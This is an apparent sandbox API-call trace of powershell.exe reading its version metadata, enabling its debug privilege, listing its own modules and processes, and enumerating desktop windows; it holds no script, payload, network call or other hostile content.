	[0383.554] lstrcpyW (in: lpString1=0x1459e0, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0383.554] CoTaskMemFree (pv=0x1459e0) 
	[0383.554] VerQueryValueW (in: pBlock=0x2c072d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0xcdb48, puLen=0xcdb40 | out: lplpBuffer=0xcdb48*=0x2c07724, puLen=0xcdb40) returned 1
	[0383.554] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0383.554] CoTaskMemAlloc (cb=0x20) returned 0x1ed2d0
	[0383.555] lstrcpyW (in: lpString1=0x1ed2d0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0383.555] CoTaskMemFree (pv=0x1ed2d0) 
	[0383.555] VerQueryValueW (in: pBlock=0x2c072d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0xcdb48, puLen=0xcdb40 | out: lplpBuffer=0xcdb48*=0x2c073cc, puLen=0xcdb40) returned 1
	[0383.555] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0383.555] CoTaskMemAlloc (cb=0x66) returned 0x15b990
	[0383.555] lstrcpyW (in: lpString1=0x15b990, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0383.555] CoTaskMemFree (pv=0x15b990) 
	[0383.555] VerQueryValueW (in: pBlock=0x2c072d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0xcdb48, puLen=0xcdb40 | out: lplpBuffer=0xcdb48*=0x0, puLen=0xcdb40) returned 0
	[0383.555] VerQueryValueW (in: pBlock=0x2c072d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0xcdb48, puLen=0xcdb40 | out: lplpBuffer=0xcdb48*=0x0, puLen=0xcdb40) returned 0
	[0383.555] VerQueryValueW (in: pBlock=0x2c072d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0xcdb48, puLen=0xcdb40 | out: lplpBuffer=0xcdb48*=0x0, puLen=0xcdb40) returned 0
	[0383.555] VerQueryValueW (in: pBlock=0x2c072d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xcdb18, puLen=0xcdb10 | out: lplpBuffer=0xcdb18*=0x2c07374, puLen=0xcdb10) returned 1
	[0383.556] CoTaskMemAlloc (cb=0x204) returned 0x194330
	[0383.556] VerLanguageNameW (in: wLang=0x0, szLang=0x194330, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0383.557] CoTaskMemFree (pv=0x194330) 
	[0383.557] VerQueryValueW (in: pBlock=0x2c072d8, lpSubBlock="\\", lplpBuffer=0xcdb68, puLen=0xcdb60 | out: lplpBuffer=0xcdb68*=0x2c07300, puLen=0xcdb60) returned 1
	[0384.069] GetCurrentProcessId () returned 0x534
	[0384.085] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0xcca90 | out: lpLuid=0xcca90*(LowPart=0x14, HighPart=0)) returned 1
	[0384.088] GetCurrentProcess () returned 0xffffffffffffffff
	[0384.089] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0xccab0 | out: TokenHandle=0xccab0*=0x2e4) returned 1
	[0384.090] AdjustTokenPrivileges (in: TokenHandle=0x2e4, DisableAllPrivileges=0, NewState=0x2c0ab50*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0384.092] CloseHandle (hObject=0x2e4) returned 1
	[0384.095] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x534) returned 0x2e4
	[0384.104] EnumProcessModules (in: hProcess=0x2e4, lphModule=0x2c0abb8, cb=0x200, lpcbNeeded=0xcdac8 | out: lphModule=0x2c0abb8, lpcbNeeded=0xcdac8) returned 1
	[0384.106] GetModuleInformation (in: hProcess=0x2e4, hModule=0x13f370000, lpmodinfo=0x2c0ae28, cb=0x18 | out: lpmodinfo=0x2c0ae28*(lpBaseOfDll=0x13f370000, SizeOfImage=0x77000, EntryPoint=0x13f37c63c)) returned 1
	[0384.428] CoTaskMemAlloc (cb=0x804) returned 0x1f83f0
	[0384.428] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x13f370000, lpBaseName=0x1f83f0, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0384.428] CoTaskMemFree (pv=0x1f83f0) 
	[0384.429] CoTaskMemAlloc (cb=0x804) returned 0x1f83f0
	[0384.429] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x13f370000, lpFilename=0x1f83f0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0384.429] CoTaskMemFree (pv=0x1f83f0) 
	[0384.430] CloseHandle (hObject=0x2e4) returned 1
	[0384.437] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x534) returned 0x2e4
	[0384.438] GetExitCodeProcess (in: hProcess=0x2e4, lpExitCode=0xcdbf8 | out: lpExitCode=0xcdbf8*=0x103) returned 1
	[0384.455] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12c0b088, Length=0x20000, ResultLength=0xcdbc0 | out: SystemInformation=0x12c0b088, ResultLength=0xcdbc0*=0x211e8) returned 0xc0000004
	[0384.456] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12c2b0b8, Length=0x239e8, ResultLength=0xcdbc0 | out: SystemInformation=0x12c2b0b8, ResultLength=0xcdbc0*=0x211e8) returned 0x0
	[0384.705] EnumWindows (lpEnumFunc=0x29366ac, lParam=0x0) returned 1
	[0385.761] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x4d0
	[0386.368] GetWindowThreadProcessId (in: hWnd=0x3013e, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x558
	[0386.368] GetWindowThreadProcessId (in: hWnd=0x201ba, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x4d0
	[0386.369] GetWindowThreadProcessId (in: hWnd=0x300fe, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x4d0
	[0386.369] GetWindowThreadProcessId (in: hWnd=0x400ae, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x4d0
	[0386.369] GetWindowThreadProcessId (in: hWnd=0x10146, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x538
	[0386.369] GetWindowThreadProcessId (in: hWnd=0x20118, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x4d0
	[0386.369] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x778
	[0386.369] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x778
	[0386.369] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x4d0
	[0386.369] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x4d0
	[0386.369] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x4d0
	[0386.369] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x4d0
	[0386.369] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x4d0
	[0386.369] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x4d0
	[0386.369] GetWindowThreadProcessId (in: hWnd=0x1005e, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x4d0
	[0386.370] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x4d0
	[0386.370] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x460
	[0386.370] GetWindowThreadProcessId (in: hWnd=0x500a2, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x4d0
	[0386.370] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x4d0
	[0386.370] GetWindowThreadProcessId (in: hWnd=0x1051a, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x1270
	[0386.370] GetWindowThreadProcessId (in: hWnd=0x1050a, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x1298
	[0386.370] GetWindowThreadProcessId (in: hWnd=0x104fa, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x120c
	[0386.370] GetWindowThreadProcessId (in: hWnd=0x204d6, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x122c
	[0386.370] GetWindowThreadProcessId (in: hWnd=0x104ce, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x11c4
	[0386.370] GetWindowThreadProcessId (in: hWnd=0x202d6, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x11b0
	[0386.370] GetWindowThreadProcessId (in: hWnd=0x104c8, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x1188
	[0386.370] GetWindowThreadProcessId (in: hWnd=0x104c4, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x1148
	[0386.370] GetWindowThreadProcessId (in: hWnd=0x202e6, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x1160
	[0386.371] GetWindowThreadProcessId (in: hWnd=0x30272, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x10fc
	[0386.371] GetWindowThreadProcessId (in: hWnd=0x104bc, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0xe34
	[0386.371] GetWindowThreadProcessId (in: hWnd=0x104ac, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0xea4
	[0386.371] GetWindowThreadProcessId (in: hWnd=0x1048e, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x514
	[0386.371] GetWindowThreadProcessId (in: hWnd=0x1047e, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0xe48
	[0386.371] GetWindowThreadProcessId (in: hWnd=0x1046e, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0xbc8
	[0386.371] GetWindowThreadProcessId (in: hWnd=0x1045e, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0xdf8
	[0386.371] GetWindowThreadProcessId (in: hWnd=0x1044c, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x318
	[0386.371] GetWindowThreadProcessId (in: hWnd=0x10440, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0xcac
	[0386.371] GetWindowThreadProcessId (in: hWnd=0x10438, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x8bc
	[0386.371] GetWindowThreadProcessId (in: hWnd=0x10434, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0xf9c
	[0386.371] GetWindowThreadProcessId (in: hWnd=0x10430, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0xf48
	[0386.371] GetWindowThreadProcessId (in: hWnd=0x10414, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0xe40
	[0386.371] GetWindowThreadProcessId (in: hWnd=0x10410, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0xecc
	[0386.372] GetWindowThreadProcessId (in: hWnd=0x1040c, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0xeb8
	[0386.372] GetWindowThreadProcessId (in: hWnd=0x10408, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0xe80
	[0386.372] GetWindowThreadProcessId (in: hWnd=0x10404, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0xe98
	[0386.372] GetWindowThreadProcessId (in: hWnd=0x10400, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0xe60
	[0386.372] GetWindowThreadProcessId (in: hWnd=0x103fc, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0xee4
	[0386.372] GetWindowThreadProcessId (in: hWnd=0x103ee, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0xf00
	[0386.372] GetWindowThreadProcessId (in: hWnd=0x10398, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0xdf0
	[0386.372] GetWindowThreadProcessId (in: hWnd=0x10388, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0xe1c
	[0386.372] GetWindowThreadProcessId (in: hWnd=0x10380, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0xdd0
	[0386.372] GetWindowThreadProcessId (in: hWnd=0x1036c, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0xd94
	[0386.372] GetWindowThreadProcessId (in: hWnd=0x10368, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0xd74
	[0386.372] GetWindowThreadProcessId (in: hWnd=0x10364, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0xd00
	[0386.372] GetWindowThreadProcessId (in: hWnd=0x1035e, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0xcd8
	[0386.373] GetWindowThreadProcessId (in: hWnd=0x20240, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0xc84
	[0386.373] GetWindowThreadProcessId (in: hWnd=0x30220, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0xca4
	[0386.373] GetWindowThreadProcessId (in: hWnd=0x2010e, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0xc64
	[0386.373] GetWindowThreadProcessId (in: hWnd=0x10344, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0xc24
	[0386.373] GetWindowThreadProcessId (in: hWnd=0x1032a, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0xb84
	[0386.373] GetWindowThreadProcessId (in: hWnd=0x10316, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0xbac
	[0386.373] GetWindowThreadProcessId (in: hWnd=0x102f8, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x384
	[0386.373] GetWindowThreadProcessId (in: hWnd=0x102de, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0xab8
	[0386.374] GetWindow (hWnd=0x102de, uCmd=0x4) returned 0x0
	[0386.374] IsWindowVisible (hWnd=0x102de) returned 0
	[0386.374] GetWindowThreadProcessId (in: hWnd=0x102da, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x33c
	[0386.374] GetWindowThreadProcessId (in: hWnd=0x102d0, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0xa44
	[0386.375] GetWindowThreadProcessId (in: hWnd=0x102cc, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0xa64
	[0386.375] GetWindowThreadProcessId (in: hWnd=0x102c8, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x8a8
	[0386.375] GetWindowThreadProcessId (in: hWnd=0x102c4, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0xaf0
	[0386.375] GetWindowThreadProcessId (in: hWnd=0x102c0, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x88c
	[0386.375] GetWindowThreadProcessId (in: hWnd=0x102bc, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0xb04
	[0386.375] GetWindowThreadProcessId (in: hWnd=0x102b0, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x910
	[0386.375] GetWindowThreadProcessId (in: hWnd=0x102ac, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x230
	[0386.375] GetWindowThreadProcessId (in: hWnd=0x30298, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0xac0
	[0386.375] GetWindowThreadProcessId (in: hWnd=0x2029a, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0xab4
	[0386.375] GetWindowThreadProcessId (in: hWnd=0x10262, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0xaac
	[0386.375] GetWindowThreadProcessId (in: hWnd=0x10252, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x3d0
	[0386.375] GetWindowThreadProcessId (in: hWnd=0x10242, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x978
	[0386.375] GetWindowThreadProcessId (in: hWnd=0x10228, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0xa7c
	[0386.376] GetWindowThreadProcessId (in: hWnd=0x10224, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x59c
	[0386.376] GetWindowThreadProcessId (in: hWnd=0x20212, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0xa88
	[0386.376] GetWindowThreadProcessId (in: hWnd=0x1021c, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0xa6c
	[0386.376] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0xa68
	[0386.376] GetWindowThreadProcessId (in: hWnd=0x20206, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x9f8
	[0386.376] GetWindowThreadProcessId (in: hWnd=0x20204, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0xa04
	[0386.376] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x924
	[0386.376] GetWindowThreadProcessId (in: hWnd=0x10200, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x8dc
	[0386.376] GetWindowThreadProcessId (in: hWnd=0x201ec, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x7dc
	[0386.376] GetWindowThreadProcessId (in: hWnd=0x301d6, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x768
	[0386.376] GetWindowThreadProcessId (in: hWnd=0x301e0, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x764
	[0386.376] GetWindowThreadProcessId (in: hWnd=0x201e4, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x820
	[0386.377] GetWindowThreadProcessId (in: hWnd=0x201c6, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x810
	[0386.377] GetWindowThreadProcessId (in: hWnd=0x301f2, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x794
	[0386.377] GetWindowThreadProcessId (in: hWnd=0x401b6, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x83c
	[0386.377] GetWindowThreadProcessId (in: hWnd=0x501be, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x7ac
	[0386.377] GetWindowThreadProcessId (in: hWnd=0x160162, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0xb44
	[0386.377] GetWindowThreadProcessId (in: hWnd=0x500ea, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0xb5c
	[0386.377] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x838
	[0386.377] GetWindowThreadProcessId (in: hWnd=0x800a8, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x4d0
	[0386.377] GetWindowThreadProcessId (in: hWnd=0x400b0, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x4d0
	[0386.377] GetWindowThreadProcessId (in: hWnd=0x300c6, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x4d0
	[0386.377] GetWindowThreadProcessId (in: hWnd=0x300d2, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x4d0
	[0386.377] GetWindowThreadProcessId (in: hWnd=0x300ce, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x4d0
	[0386.377] GetWindowThreadProcessId (in: hWnd=0x300d8, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x4d0
	[0386.378] GetWindowThreadProcessId (in: hWnd=0x400b8, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x4d0
	[0386.378] GetWindowThreadProcessId (in: hWnd=0x300ac, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x4d0
	[0386.378] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x818
	[0386.378] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x5b8
	[0386.378] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x494
	[0386.378] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x1ec
	[0386.378] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x440
	[0386.378] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x7e8
	[0386.378] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x730
	[0386.378] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x2c8
	[0386.378] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x31c
	[0386.378] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x330
	[0386.378] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x128
	[0386.379] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x5c8
	[0386.379] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x6f8
	[0386.379] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x358
	[0386.379] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x73c
	[0386.379] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0xb0
	[0386.379] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x250
	[0386.379] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x240
	[0386.379] GetWindowThreadProcessId (in: hWnd=0x2015e, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x790
	[0386.379] GetWindowThreadProcessId (in: hWnd=0x40112, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x61c
	[0386.379] GetWindowThreadProcessId (in: hWnd=0x3015a, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x540
	[0386.379] GetWindowThreadProcessId (in: hWnd=0x10150, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x538
	[0386.379] GetWindowThreadProcessId (in: hWnd=0x1014e, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x568
	[0386.379] GetWindowThreadProcessId (in: hWnd=0x20144, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x538
	[0386.380] GetWindowThreadProcessId (in: hWnd=0x10138, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x568
	[0386.380] GetWindowThreadProcessId (in: hWnd=0x10130, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x538
	[0386.380] GetWindowThreadProcessId (in: hWnd=0x10126, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x540
	[0386.380] GetWindowThreadProcessId (in: hWnd=0x200d6, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x540
	[0386.380] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x57c
	[0386.380] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x460
	[0386.380] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x554
	[0386.380] GetWindowThreadProcessId (in: hWnd=0x50094, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x4d0
	[0386.380] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x528
	[0386.380] GetWindowThreadProcessId (in: hWnd=0x10088, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x4d0
	[0386.380] GetWindowThreadProcessId (in: hWnd=0x10080, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x4d0
	[0386.380] GetWindowThreadProcessId (in: hWnd=0x1006e, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x4d0
	[0386.380] GetWindowThreadProcessId (in: hWnd=0x20020, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x79c
	[0386.381] GetWindowThreadProcessId (in: hWnd=0x1006a, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x4d0
	[0386.381] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x4e0
	[0386.381] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x4d0
	[0386.381] GetWindowThreadProcessId (in: hWnd=0x1004a, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x460
	[0386.381] GetWindowThreadProcessId (in: hWnd=0x20046, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x460
	[0386.381] GetWindowThreadProcessId (in: hWnd=0x30044, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x44c
	[0386.381] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x778
	[0386.381] GetWindowThreadProcessId (in: hWnd=0x100f2, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x460
	[0386.381] GetWindowThreadProcessId (in: hWnd=0x30140, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x558
	[0386.381] GetWindowThreadProcessId (in: hWnd=0x1005c, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x4d0
	[0386.381] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x4d0
	[0386.381] GetWindowThreadProcessId (in: hWnd=0x1051c, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x12d0
	[0386.381] GetWindowThreadProcessId (in: hWnd=0x1050c, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x12cc
	[0386.382] GetWindowThreadProcessId (in: hWnd=0x104fc, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x12c8
	[0386.382] GetWindowThreadProcessId (in: hWnd=0x104da, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x1290
	[0386.382] GetWindowThreadProcessId (in: hWnd=0x104d0, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x1218
